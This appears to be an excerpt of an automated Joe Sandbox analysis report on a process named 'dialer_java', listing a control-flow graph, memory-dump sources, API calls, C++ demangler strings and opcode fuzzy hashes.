                                      control_flow_graph 1877 7ff6e3a7ca90-7ff6e3a7caaf 1878 7ff6e3a7cac1-7ff6e3a7cac4 1877->1878 1879 7ff6e3a7cab1-7ff6e3a7cab4 1877->1879 1881 7ff6e3a7cac6-7ff6e3a7cac9 1878->1881 1882 7ff6e3a7caf5 1878->1882 1879->1878 1880 7ff6e3a7cab6-7ff6e3a7cabc 1879->1880 1880->1878 1883 7ff6e3a7cacb-7ff6e3a7cad1 1881->1883 1884 7ff6e3a7cad4-7ff6e3a7cad7 1881->1884 1885 7ff6e3a7caf8-7ff6e3a7cb02 1882->1885 1883->1884 1886 7ff6e3a7cb0c-7ff6e3a7cb19 1884->1886 1887 7ff6e3a7cad9-7ff6e3a7cadc 1884->1887 1888 7ff6e3a7cb1b-7ff6e3a7cb24 1885->1888 1889 7ff6e3a7cb04-7ff6e3a7cb07 1885->1889 1886->1888 1886->1889 1887->1885 1892 7ff6e3a7cade-7ff6e3a7caf1 1887->1892 1890 7ff6e3a7cb2a-7ff6e3a7cb33 1888->1890 1891 7ff6e3a7cc35-7ff6e3a7cc54 1888->1891 1893 7ff6e3a7ccc8-7ff6e3a7ccd9 1889->1893 1894 7ff6e3a7cb39-7ff6e3a7cb42 1890->1894 1895 7ff6e3a7ce88-7ff6e3a7ce9a call 7ff6e3a70a70 1890->1895 1896 7ff6e3a7cc56-7ff6e3a7cc63 malloc 1891->1896 1897 7ff6e3a7cc80-7ff6e3a7ccbf 1891->1897 1892->1889 1900 7ff6e3a7caf3 1892->1900 1898 7ff6e3a7ccdb-7ff6e3a7cce4 1893->1898 1899 7ff6e3a7ccea-7ff6e3a7cced 1893->1899 1894->1889 1901 7ff6e3a7cb44-7ff6e3a7cb61 1894->1901 1906 7ff6e3a7cf44 1895->1906 1917 7ff6e3a7cea0-7ff6e3a7ceaa 1895->1917 1902 7ff6e3a7d0db-7ff6e3a7d0e0 call 7ff6e3a62d30 1896->1902 1903 7ff6e3a7cc69-7ff6e3a7cc7d 1896->1903 1897->1893 1898->1899 1905 7ff6e3a7ce73-7ff6e3a7ce7d 1898->1905 1899->1906 1907 7ff6e3a7ccf3-7ff6e3a7ccf6 1899->1907 1900->1888 1910 7ff6e3a7cbbe-7ff6e3a7cbc1 1901->1910 1903->1897 1905->1907 1911 7ff6e3a7ce83 1905->1911 1908 7ff6e3a7cf46-7ff6e3a7cf59 1906->1908 1907->1906 1913 7ff6e3a7ccfc-7ff6e3a7cd06 1907->1913 1915 7ff6e3a7cbcc-7ff6e3a7cbd7 call 7ff6e3a6ba60 1910->1915 1916 7ff6e3a7cbc3-7ff6e3a7cbc6 1910->1916 1911->1906 1918 7ff6e3a7cd08-7ff6e3a7cd0b 1913->1918 1919 7ff6e3a7cd14-7ff6e3a7cd1f call 7ff6e3a6ba60 1913->1919 1915->1908 1930 7ff6e3a7cbdd-7ff6e3a7cbe8 1915->1930 1916->1915 1920 7ff6e3a7cf68-7ff6e3a7cf96 call 7ff6e3a6d9a0 1916->1920 1917->1906 1922 7ff6e3a7ceb0-7ff6e3a7ceb3 1917->1922 1918->1919 1923 7ff6e3a7cd0d-7ff6e3a7cd11 1918->1923 1919->1906 1933 7ff6e3a7cd25-7ff6e3a7cd4f 1919->1933 1936 7ff6e3a7cf9c-7ff6e3a7cfad malloc 1920->1936 1937 7ff6e3a7d095 1920->1937 1922->1906 1927 7ff6e3a7ceb9-7ff6e3a7ced7 1922->1927 1923->1919 1931 7ff6e3a7ced9-7ff6e3a7cee6 malloc 1927->1931 1932 7ff6e3a7cf03-7ff6e3a7cf3f 1927->1932 1938 7ff6e3a7cbaa-7ff6e3a7cbba 1930->1938 1939 7ff6e3a7cbea-7ff6e3a7cbff 1930->1939 1931->1902 1940 7ff6e3a7ceec-7ff6e3a7cf00 1931->1940 1932->1893 1934 7ff6e3a7cd72-7ff6e3a7cd75 1933->1934 1935 7ff6e3a7cd51 1933->1935 1943 7ff6e3a7cd7b-7ff6e3a7cd7e 1934->1943 1944 7ff6e3a7cf5a-7ff6e3a7cf61 1934->1944 1942 7ff6e3a7cde2-7ff6e3a7cde9 1935->1942 1936->1902 1945 7ff6e3a7cfb3-7ff6e3a7cfca 1936->1945 1941 7ff6e3a7d099-7ff6e3a7d0d6 1937->1941 1938->1910 1946 7ff6e3a7cc05-7ff6e3a7cc10 malloc 1939->1946 1947 7ff6e3a7cb70-7ff6e3a7cb7f realloc 1939->1947 1940->1932 1941->1893 1951 7ff6e3a7cdeb-7ff6e3a7cdf9 1942->1951 1952 7ff6e3a7ce0e-7ff6e3a7ce19 call 7ff6e3a6ba60 1942->1952 1943->1942 1949 7ff6e3a7cd80 1943->1949 1948 7ff6e3a7cfd2-7ff6e3a7d005 call 7ff6e3a6d9a0 1944->1948 1945->1941 1946->1902 1953 7ff6e3a7cc16-7ff6e3a7cc1c 1946->1953 1947->1902 1950 7ff6e3a7cb85-7ff6e3a7cba6 1947->1950 1964 7ff6e3a7d007-7ff6e3a7d014 malloc 1948->1964 1965 7ff6e3a7d031-7ff6e3a7d090 1948->1965 1949->1934 1949->1942 1950->1938 1956 7ff6e3a7cf63-7ff6e3a7cf66 1951->1956 1957 7ff6e3a7cdff-7ff6e3a7ce08 1951->1957 1952->1908 1966 7ff6e3a7ce1f-7ff6e3a7ce2a 1952->1966 1959 7ff6e3a7cc2c-7ff6e3a7cc30 1953->1959 1960 7ff6e3a7cc1e-7ff6e3a7cc27 memcpy 1953->1960 1956->1948 1957->1952 1962 7ff6e3a7cfcf 1957->1962 1959->1950 1960->1959 1962->1948 1964->1902 1967 7ff6e3a7d01a-7ff6e3a7d02e 1964->1967 1965->1908 1968 7ff6e3a7ce2c-7ff6e3a7ce3d 1966->1968 1969 7ff6e3a7cdca-7ff6e3a7cde0 1966->1969 1967->1965 1970 7ff6e3a7ce43-7ff6e3a7ce4e malloc 1968->1970 1971 7ff6e3a7cd90-7ff6e3a7cd9f realloc 1968->1971 1969->1934 1969->1942 1970->1902 1972 7ff6e3a7ce54-7ff6e3a7ce5a 1970->1972 1971->1902 1973 7ff6e3a7cda5-7ff6e3a7cdc6 1971->1973 1974 7ff6e3a7ce5c-7ff6e3a7ce65 memcpy 1972->1974 1975 7ff6e3a7ce6a-7ff6e3a7ce6e 1972->1975 1973->1969 1974->1975 1975->1973
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$memcpy
                                      • String ID: noexcept
                                      • API String ID: 3800483350-1409219070
                                      • Opcode ID: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
                                      • Instruction ID: 497ee9cecd49459cca12bba5b537dd8c28c6926de11d3fbb5437323afad41892
                                      • Opcode Fuzzy Hash: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
                                      • Instruction Fuzzy Hash: EC02E173709B8286EA608B19E4863797BA4EB44B80F444135DB8E977D9DF3DE492C309
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                      • String ID: 0$X$`
                                      • API String ID: 329590056-2527496196
                                      • Opcode ID: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
                                      • Instruction ID: 294200a2d58f4bc2d3636bb08d9779d146ec37a5b7c87d8947ba10aaeb81cf1b
                                      • Opcode Fuzzy Hash: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
                                      • Instruction Fuzzy Hash: E0028023A18BC281E7208F19E4463AA7BA0FB95754F404236DADDA37E5DF3ED185C705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: restric$ volatil
                                      • API String ID: 471065373-3617781792
                                      • Opcode ID: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
                                      • Instruction ID: 2376b836ec261bd654be748e834fbeebe01f8c35ee83a166832c189813d14136
                                      • Opcode Fuzzy Hash: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
                                      • Instruction Fuzzy Hash: D2B1A3B3B05B8682DA28CF5AE58536DB761EB94BC4F008531CB8E577A4EF3DE4818305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcpy
                                      • String ID: at offs$set
                                      • API String ID: 1059646398-2369781007
                                      • Opcode ID: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
                                      • Instruction ID: 47aecb54895dc2c736bd86f7a756e7eec8339ef04b985cacdcbc7ff5298d1a0f
                                      • Opcode Fuzzy Hash: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
                                      • Instruction Fuzzy Hash: 70A1D3B3B05B8182EF298F1AE4913ADA7A1EB58BC4F048131DB8D577A4EF3DD4918305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fputwc$memset
                                      • String ID: o$o$o$o$o$o
                                      • API String ID: 822753988-2858737866
                                      • Opcode ID: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
                                      • Instruction ID: 66f988cbf989770fc3374fedf5eb0b68cb0fafe7d885b9b19799963bfb6b7fe8
                                      • Opcode Fuzzy Hash: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
                                      • Instruction Fuzzy Hash: 909138A3F2424286F3354E1E95467397EE1AB24784F019234CF6AE76E1DE3EE8C18705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: restric$ volatil
                                      • API String ID: 471065373-3617781792
                                      • Opcode ID: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
                                      • Instruction ID: 33bf4cc35ee2ee4a9f0aedce820314503a22c364bd51d5b9f74cba2a1ca46376
                                      • Opcode Fuzzy Hash: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
                                      • Instruction Fuzzy Hash: 06B194B7B06B8682DE298F5AE58536D7761EB54BC0F008531CB8E977A4EF2DE481C305
                                      APIs
                                      Strings
                                      • Index < size() && "Invalid access!", xrefs: 00007FF6E3A80057
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A8005E
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: freememcpyrealloc$_assertmalloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index < size() && "Invalid access!"
                                      • API String ID: 3641880838-4289452498
                                      • Opcode ID: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
                                      • Instruction ID: 736eb1d2218bd780c407cb67fbef5e28c500ebb277d10965cd38ce307100b0f4
                                      • Opcode Fuzzy Hash: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
                                      • Instruction Fuzzy Hash: 5D51CD63B19A8182EA20DB09E84537DABA0FB98BC4F144131EE8D93BA5DF3DD5C1C305
                                      APIs
                                      Strings
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
                                      • _, xrefs: 00007FF6E3A7198D
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertmallocmemcpyrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$_$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 2036919697-1558868925
                                      • Opcode ID: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
                                      • Instruction ID: 98257d416c217b15665d053e62b954f3c439b2fbca8d7665b891b90697d2c019
                                      • Opcode Fuzzy Hash: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
                                      • Instruction Fuzzy Hash: 9061B033719B4682EA70DB19E4863BA6BE5EB44780F440035CB8E97B95DF3DE185C34A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy$malloc
                                      • String ID:
                                      • API String ID: 774493741-0
                                      • Opcode ID: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
                                      • Instruction ID: 7cd01e5d8c93b3e576fa1c8e260ff398ef3518a8763863f279ce4976a606e7db
                                      • Opcode Fuzzy Hash: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
                                      • Instruction Fuzzy Hash: B7A19FB3B05B8282EA25CF19E4853B9A7A5EB547C0F048531CF9D577A5EF3EE4928304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
                                      • Instruction ID: 408032a0d1000fa176f4fecf1984e0b5761dd8b02033f52a8ebe7da9341cd56d
                                      • Opcode Fuzzy Hash: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
                                      • Instruction Fuzzy Hash: 76A181B3B05B8282EA398F4AF495379A7A1EB547C0F048536CB8E577D5EF3DE0918205
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
                                      • Instruction ID: c611f1e4dd199ede0ab2d05a464c72f075852f6f375ce8707af284827adfa6e1
                                      • Opcode Fuzzy Hash: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
                                      • Instruction Fuzzy Hash: A3024173B3924287E7748A1EE45273A7BA1EB54740F005139DB9B96A81DF2FE9C0C709
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fputc
                                      • String ID: .
                                      • API String ID: 1992160199-248832578
                                      • Opcode ID: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
                                      • Instruction ID: 3de62886d2fa96c97cd219b09e5f199e263d822583b7b3269fee9cbce8672005
                                      • Opcode Fuzzy Hash: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
                                      • Instruction Fuzzy Hash: D9F17573B092C687F7788A19E15A77E7B92EB14740F004135CB9E96A81DF2EF481C71A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: string literal$struct
                                      • API String ID: 471065373-3644149429
                                      • Opcode ID: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
                                      • Instruction ID: d4da2ec0ac50ab083998c65aa112e452ee772723192ebf642ebfcf579f7b3323
                                      • Opcode Fuzzy Hash: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
                                      • Instruction Fuzzy Hash: 34D1EF73B2AB8245EA658B1DA4523B97BD1AF047C0F044531CB9E97B81DF3EE4C1830A
                                      APIs
                                      Strings
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
                                      Memory Dump Source
